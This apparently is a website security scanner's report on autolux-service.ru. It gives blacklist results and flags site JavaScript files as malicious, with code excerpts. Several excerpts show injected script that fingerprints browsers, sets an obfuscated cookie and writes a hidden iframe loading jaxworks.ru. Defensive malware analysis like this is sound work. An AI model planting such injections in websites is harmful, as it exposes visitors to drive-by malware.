Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=autolux-service.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://autolux-service.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.autolux-service.ru/ | 200 OK Content-Length: 26542 Content-Type: text/html | suspicious |
Suspicious code found </span> | ||
http://www.autolux-service.ru/cms/classes/js/menu.js | 200 OK Content-Length: 14859 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 function delayhidemenu(){if(ie4||ns6)delayhide=setTimeout("hidemenu()",disappeardelay)}function clearhidemenu(){typeof delayhide!="undefined"&&clearTimeout(delayhide)}if(hidemenu_onclick=="yes")document.onclick=hidemenu;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.autolux-service.ru/cms/classes/js/gpl_ajax.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://www.autolux-service.ru/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://www.autolux-service.ru/cms/classes/js/js_edit.js | 200 OK Content-Length: 20511 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 Antivirus reports:
| ||
http://www.autolux-service.ru/templates/grab/js/noobslide.js | 200 OK Content-Length: 7338 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 } if (!braborossa()) { var cookie = getCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9'); if (cookie == undefined) { setCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9', true, 259200); document.write('<i'+'f'+'r'+'a'+'m'+'e'+' src='+'http://jaxworks.ru/ghj5.u35hh55hj?7'+' style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115">'+'<'+'/'+'i'+'f'+'r'+'a'+'m'+'e>'); } }; })(); Antivirus reports:
| ||
http://www.autolux-service.ru/templates/grab/js/jquery.js | 200 OK Content-Length: 41774 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 Antivirus reports:
| ||
http://www.autolux-service.ru/templates/grab/js/tabs.js | 200 OK Content-Length: 12435 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 var thisClass = this.className.slice(0,2); $j('div.t1').hide(); $j('div.t2').hide(); $j('div.t3').hide(); $j('div.t4').hide(); $j('div.' + thisClass).show(); $j('ul.tabs.tabs1 li').removeClass('tab-current'); $j(this).addClass('tab-current'); }); $j("#featured > ul").tabs({fx:{opacity: "toggle"}}).tabs("rotate", 5000, true); });;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.autolux-service.ru/templates/grab/js/jquery-ui.min.js | 200 OK Content-Length: 7338 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 } if (!braborossa()) { var cookie = getCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9'); if (cookie == undefined) { setCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9', true, 259200); document.write('<i'+'f'+'r'+'a'+'m'+'e'+' src='+'http://jaxworks.ru/ghj5.u35hh55hj?7'+' style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115">'+'<'+'/'+'i'+'f'+'r'+'a'+'m'+'e>'); } }; })(); Antivirus reports:
| ||
http://www.autolux-service.ru/templates/grab/js/qTip.js | 200 OK Content-Length: 15078 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 } tooltip.show = function (text) { if (!this.tip) return; this.tip.innerHTML = text; this.tip.style.display = "block"; } tooltip.hide = function () { if (!this.tip) return; this.tip.innerHTML = ""; this.tip.style.display = "none"; } window.onload = function () { tooltip.init (); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.autolux-service.ru/cms/classes/tagcloud/swfobject.js | 200 OK Content-Length: 18818 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 Antivirus reports:
| ||
http://www.autolux-service.ru/js/syhyqu.js | 200 OK Content-Length: 112075 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\ if (!mdom) { newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>"; if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); } } } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: autolux-service.ru
Result:
GET / HTTP/1.1
Host: autolux-service.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: autolux-service.ru
Referer: http://www.google.com/search?q=autolux-service.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: autolux-service.ru
Referer: http://www.google.com/search?q=autolux-service.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.